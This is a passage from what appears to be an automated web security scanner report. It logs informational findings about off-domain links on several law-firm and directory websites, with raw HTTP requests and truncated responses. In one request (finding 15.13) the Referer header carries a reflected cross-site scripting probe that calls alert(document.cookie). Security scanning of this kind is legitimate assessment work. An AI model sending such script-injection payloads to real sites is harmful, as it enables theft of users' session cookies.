<p align="center"><a href="http://smallactsmanifesto.org" title="Small Acts Manifesto"><img src="http://smallactsmanifesto.org/media/images/smallacts-badge-120x60-blue.png" style="border: none;" alt="Small Acts Manifesto" /></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/rafael_lima_podcast" title="Podcast"><img src="/wp-content/themes/mainstream/images/ico-podcast.png" alt="Podcast icon" />
...[SNIP]...
<li><a href="http://twitter.com/rafaelp" title="Twitter"><img src="/wp-content/themes/mainstream/images/ico-twitter.png" alt="Twitter icon" />
...[SNIP]...
<li><a href="http://github.com/rafaelp" title="Github"><img src="/wp-content/themes/mainstream/images/ico-github.png" alt="Github icon" />
...[SNIP]...
<li><a href="http://metronus.com/blog/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Andr.. Fonseca</a>
...[SNIP]...
<li><a href="http://caikesouza.com/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Caike Souza</a>
...[SNIP]...
<li><a href="http://diegodukao.net/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Diego Duk..o</a>
...[SNIP]...
<li><a href="http://blog.distopico.org/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Edgard Arakaki</a>
...[SNIP]...
<li><a href="http://gc.blog.br/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Guilherme Chapiewski</a>
...[SNIP]...
<li><a href="http://henriquebastos.net/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Henrique Bastos</a>
...[SNIP]...
<li><a href="http://tapajos.me/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Marcos Tapaj..s</a>
...[SNIP]...
<li><a href="http://mariomariani.blogspot.com/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">M..rio Mariani</a>
...[SNIP]...
<li><a href="http://rafael.tauil.com.br/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Rafael Tauil</a>
...[SNIP]...
<li><a href="http://ramonpage.com/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Ramon Bispo</a>
...[SNIP]...
<li><a href="http://mergulhao.info/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Sylvestre Mergulh..o</a>
...[SNIP]...
<li><a href="http://vp.blog.br/?utm_source=horaextra.org&amp;utm_medium=affiliate&amp;utm_content=textlink&amp;utm_campaign=horaextra">Vitor Pellegrino</a>
...[SNIP]...
<li><a href="http://elencezar.com.br">..len Cezar</a>
...[SNIP]...
<li><a href="http://www.nomedojogo.com">Carlos Brando</a>
...[SNIP]...
<li><a href="http://www.akitaonrails.com/">Fabio Akita</a>
...[SNIP]...
<li><a href="http://marcelomurad.com/">Marcelo Murad</a>
...[SNIP]...
<li><a href="http://renata.adm.br/">Renata C..li</a>
...[SNIP]...
<li><a href="http://viniciusbraga.com">Vinicius Braga</a>
...[SNIP]...
<li><a href="http://blog.improveit.com.br">Vinicius Manh..es (Improve-It)</a>
...[SNIP]...
<p style="text-align: center"><a href="http://bielsystems.com.br" title="BielSystems" target="_blank" ><img src="http://rafael.adm.br/wp-content/uploads/2009/09/header-logo.png" alt="BielSystems" width="265" height="60">
...[SNIP]...
<p style="text-align: center"><a title="Cobre Gr..tis" href="http://cobregratis.com.br/?utm_campaign=blogwatch&utm_source=rafael.adm.br&utm_medium=banner&utm_term=sidebar-empresas_negocios_parceiros"><img src="http://rafael.adm.br/wp-content/uploads/2009/11/small_CobreGratis3.gif" width="272" height="66" alt="Cobre Gr..tis">
...[SNIP]...
<p style="text-align: center"><a href="http://myfreecomm.com.br" title="Myfreecomm" target="_blank" ><img src="http://rafael.adm.br/wp-content/uploads/2009/09/logo-myfreecomm.png" alt="BielSystems" width="189" height="55">
...[SNIP]...
<p style="text-align: center"><a href="http://www.financedesktop.com.br/download?utm_source=parceiros&utm_medium=banner&utm_content=185_53&utm_campaign=financedesktop" title="Sistema gratuito de gerenciamento financeiro pessoal que possui planejamento or..ament..rio, concilia....o banc..ria, simulador de a....es, gest..o de finan..as, tudo gr..tis!"><img border="0" alt="FinanceDesktop Download Gratuito" src="http://www.financedesktop.com.br/banners/fdb_azul_185_53.png" width="185" height="53" /></a></p>

<p style="text-align: center"><a href="http://financaspessoais.blog.br/?utm_source=blogger&amp;utm_medium=badge&amp;utm_term=rafael-lima&amp;utm_content=232-58&amp;utm_campaign=blogwatch" target="_blank" border="0" title="Blog Finan..as Pessoais"><img src="http://financaspessoais.blog.br/badges/financaspessoais_232x58.png" alt="Blog Finan..as Pessoais" width="232" height="58"></a></p>

<p style="text-align: center"><a href="http://beonthe.net" title="Tenha seu site em 24h com o Be on the Net">
<img src="http://beonthe.net/accounts/beonthe.net/images/tenha_site_beonthenet_160x55.png"
alt="Crie um site em 24h com o Be on the Net" title="Tenha seu site em 24h com o Be on the Net" />

</a></p>

<p style="text-align: center"><a href="http://bigbangcafe.net/" title="Apaixonados por camisetas originais, criativas e de qualidade">
<img src="http://rafael.adm.br/wp-content/uploads/2009/12/bbcafe_tees.png"
alt="Apaixonados por camisetas originais, criativas e de qualidade" title="Apaixonados por camisetas originais, criativas e
...[SNIP]...
<span class="menu"> | Powered by <a href="http://wordpress.org/">WordPress</a>
...[SNIP]...
<p><a href="http://woothemes.com" title="WooThemes"><img src="http://rafael.adm.br/wp-content/themes/mainstream/images/woothemes.png" alt="WooThemes Logo" />
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

15.13. http://skaddenpractices.skadden.com/sec/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sec/index.php?7ae3b HTTP/1.1
Host: skaddenpractices.skadden.com
Proxy-Connection: keep-alive
Referer: http://skaddenpractices.skadden.com/sec/?7ae3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecc7c0c0318c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:50 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21494


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<td><a href="http://www.sec.gov/news/press/2010/2010-224.htm" target="_blank">SEC Charges Steven Rattner in Pay-to-Play Scheme Involving New York State Pension Fund</a>
...[SNIP]...
<td><a href="http://www.sec.gov/news/press/2010/2010-225.htm" target="_blank">SEC Charges Former Madoff Employees with Fraud</a>
...[SNIP]...
<td><a href="http://www.sec.gov/news/press/2010/2010-223.htm" target="_blank">SEC Charges New York Firms and Chief Compliance Officer for Inadequate Procedures to Protect Nonpublic Information</a>
...[SNIP]...
<td><a href="http://www.sec.gov/news/press/2010/2010-220.htm" target="_blank">SEC Brings Additional Charges in Its Ongoing Investigations Into Two Insider Trading Rings</a>
...[SNIP]...
<td><a href="http://www.finra.org/Newsroom/NewsReleases/2010/P122416" target="_blank">FINRA Fines Goldman Sachs $650,000 for Failing to Disclose Wells Notices</a>
...[SNIP]...
<td><a href="http://www.sec.gov/news/press/2010/2010-214.htm" target="_blank">SEC Charges Seven Oil Services and Freight Forwarding Companies for Widespread Bribery of Customs Officials</a>
...[SNIP]...

15.14. http://web2.domainmall.com/domainserve/domainView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /domainserve/domainView?dn=testdomain123.com/?popunder=1 HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:17 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=46cc223737a220bc7dc47a3a27ff6b4a35a3a7e8; path=/; expires=Wed, 19-Jan-2011 19:15:17 GMT
Content-Length: 31217
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<meta name="robots" content="noindex,nofollow">

<link rel='stylesheet' type='text/css' href='http://static-vip.school9.com/images/profile/styles/styles.css' />


<style type="text/css">
...[SNIP]...
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW" />
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...
<div style="float:left;">
<img src="http://static-vip.school9.com/images/profile/images/logo.png" width="101" height="86" align="left" /><span class="domain">
...[SNIP]...
<td width="10" align="right"><img src="http://static-vip.school9.com/images/profile/images/bx_tp_rt_cnr.jpg" width="10" height="12" /></td>
...[SNIP]...
<td width="11"><img src="http://static-vip.school9.com/images/profile/images/bx_btm_lf_cnr.jpg" width="11" height="11" /></td>
...[SNIP]...
<td width="10" align="right"><img src="http://static-vip.school9.com/images/profile/images/bx_btm_rt_cnr.jpg" width="10" height="11" /></td>
...[SNIP]...
<td width="10" align="right"><img src="http://static-vip.school9.com/images/profile/images/bx_tp_rt_cnr.jpg" width="10" height="12" /></td>
...[SNIP]...
<td width='13' align='left' valign='top' style='padding:4px 0 0 0;'><a href='http://www.pacificpoker.com/?sr=353855&flag=0000' target='_blank'><img src='http://static-vip.school9.com/images/profile/images/arrow.gif' border='0' /></a>
...[SNIP]...
<td align='left'><a href='http://www.pacificpoker.com/?sr=353855&flag=0000' class='txtlink' target='_blank'><font color='#b76969'>
...[SNIP]...
<td width="11"><img src="http://static-vip.school9.com/images/profile/images/bx_btm_lf_cnr.jpg" width="11" height="11" /></td>
...[SNIP]...
<td width="10" align="right"><img src="http://static-vip.school9.com/images/profile/images/bx_btm_rt_cnr.jpg" width="10" height="11" /></td>
...[SNIP]...
<div style="text-align:center; margin:0px 0 5px 0; padding:20px 0 0 0; width:800px;"><a class='adssm' href="http://www.testdomain123.com/?popunder/domainserve/privacy?dn=testdomain123.com/?popunder" target="_blank"><font color="#ffffff">
...[SNIP]...

15.15. http://www.arnoldporter.com/events.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /events.cfm?id=670&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Natural Resource Damages: The Ground, Groundwater an
...[SNIP]...
<p>
               <a href="http://www.lawseminars.com/detail.php?SeminarCode=11NRDFL" target="_blank">View Event Website</a>
...[SNIP]...

15.16. http://www.arnoldporter.com/multimedia.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non-
...[SNIP]...
<div class="formrow">
               <a href="http://www.itunes.com/podcast?id=378831191"><img src="http://www.arnoldporter.com//images/iTunesButton.jpg" width="77" align="bottom" height="23" border="0" alt="Listen in iTunes" />
...[SNIP]...

15.17. http://www.arnoldporter.com/publications.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /publications.cfm?id=2795&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te
...[SNIP]...
<p>
               <a href="http://jeclap.oxfordjournals.org/content/early/2010/10/21/jeclap.lpq062.full.pdf?ijkey=susEWMn9zEmLtCQ&keytype=ref" target="_blank">View Publication (URL)</a>
...[SNIP]...

15.18. http://www.dcchamber.org/chamber/memberDetail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /chamber/memberDetail.asp?763 HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:47:49 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=5vkrrjg7cv37iiacajq7gu3jm0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

15.19. http://www.dcregistry.com/cgi-bin/calendar/calendar.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcregistry.com
Path:   /cgi-bin/calendar/calendar.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/calendar/calendar.cgi?session_key=&search_and_display_db_button=on&day=19&month=1&year=2011&results_format=headlines&query=date_search HTTP/1.1
Host: www.dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 19 Jan 2011 15:48:03 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title>Temporarily Unavailable</title>
<meta http-equiv=
...[SNIP]...
<td align="right"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" />
...[SNIP]...
</a>|<a
href="http://www.hagenhosting.com" target="_top">
Web Hosting</a>
...[SNIP]...
<td class="regalt" align="center"><a href="http://www.hagenhosting.com"><img alt="Hagen Hosting" width="305" height="44" title="Hagen Hosting: Premium quality web hosting" src="http://www.dcregistry.com/graphics/test3.gif" border="1" />
...[SNIP]...
<font class="reg"><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" width="130" height="56" border="1" alt="Premium quality web hosting!" title="Premium quality web hosting!" />
...[SNIP]...
<br />
<a href="http://www.hagenhosting.com">Premium quality web hosting!</a>
...[SNIP]...
<p><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" border="1" alt="Premium quality web hosting!" width="130" height="56" title="Premium quality web hosting!" />
...[SNIP]...
<br />
<a href="http://www.hagenhosting.com">Premium quality web hosting!</a>
...[SNIP]...
<font class="small"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" />
...[SNIP]...
<br />
<a href="http://www.e-classifieds.net">Classifieds for every website!</a>
...[SNIP]...
</script> <a href="http://www.hagensoftware.com">Hagen Software</a>
...[SNIP]...

15.20. http://www.dcregistry.com/cgi-bin/classifieds/classifieds.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcregistry.com
Path:   /cgi-bin/classifieds/classifieds.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/classifieds/classifieds.cgi?db=rentals HTTP/1.1
Host: www.dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:47:56 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 57980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title>Rentals & Roommates</title>
<meta http-equiv="Con
...[SNIP]...
<td align="right"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" />
...[SNIP]...
</a>|<a
href="http://www.hagenhosting.com" target="_top">
Web Hosting</a>
...[SNIP]...
<td class="regalt" align="center"><a href="http://www.hagenhosting.com"><img alt="Hagen Hosting" width="305" height="44" title="Hagen Hosting: Premium quality web hosting" src="http://www.dcregistry.com/graphics/test3.gif" border="1" />
...[SNIP]...
<font class="reg"><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" width="130" height="56" border="1" alt="Premium quality web hosting!" title="Premium quality web hosting!" />
...[SNIP]...
<br />
<a href="http://www.hagenhosting.com">Premium quality web hosting!</a>
...[SNIP]...
<p><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" border="1" alt="Premium quality web hosting!" width="130" height="56" title="Premium quality web hosting!" />
...[SNIP]...
<br />
<a href="http://www.hagenhosting.com">Premium quality web hosting!</a>
...[SNIP]...
<td align=right valign="top"><a href="http://www.e-classifieds.net/"><img src="http://www.dcregistry.com/classifieds/graphics/eclass_pre.gif" width=116 height=44 alt="Powered by e-Classifieds" border=0>
...[SNIP]...
<font class="small"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" border="1" align="middle" alt="banner" title="Classifieds for every website!" />
...[SNIP]...
<br />
<a href="http://www.e-classifieds.net">Classifieds for every website!</a>
...[SNIP]...
<i>Copyright &copy; 1995-
2011 <a href="http://www.hagensoftware.com">Hagen Software</a>
...[SNIP]...

15.21. http://www.ebglaw.com/showoffice.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /showoffice.aspx?Show=542 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
</script>
   

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
<li class="item"><a href="https://ams-legal.net/ebglaw" id="NavTop_RadMenu_m15_m1" title="Client Access" class="link"><span class="text">
...[SNIP]...

15.22. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.cfm?fuseaction=seminars.detail&eventID=5575&site_id=492 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A47%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D111%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:47 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
</script>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab##version=9,0,28,0" width="375" height="20" title="newsTicker" accesskey="f" tabindex="40" title="Fulbright &amp; Jaworski Events">
<param name="movie" value="/fjLib/media/flash/news/newsTicker.swf" />
...[SNIP]...
<td height="40" colspan="3">
                   
                       
                                                                       <a href="http://www.litigationtrends.com">
           <img src="/img/banners/ribbon/Ribbon.jpg" alt="" height="45" width="750" border="0" />
...[SNIP]...
<br>


<a href="http://www.mapquest.com/maps/map.adp?countrycode=250&country=US&address=111+North+Post+Oak+Lane&city=Houston&State=TX&zipcode=77024" target="_blank" class="more">Click Here for Directions</a>
...[SNIP]...
<td align="center" bordercolor="#DDD1C3">
                                   

    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab##version=7,0,19,0" width="180" height="62" accesskey="f" tabindex="40" title="Fulbright &amp; Jaworski Events">
<param name="movie" value="/fjLib/media/flash/events/eventsBanner_03.swf" />
...[SNIP]...

15.23. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.cfm?fuseaction=news.detail&article_id=9405&site_id=286 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D84%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:45 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
</script>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab##version=9,0,28,0" width="375" height="20" title="newsTicker" accesskey="f" tabindex="40" title="Fulbright &amp; Jaworski Events">
<param name="movie" value="/fjLib/media/flash/news/newsTicker.swf" />
...[SNIP]...
<td height="40" colspan="3">
                   
                       
                                                                       <a href="http://www.litigationtrends.com">
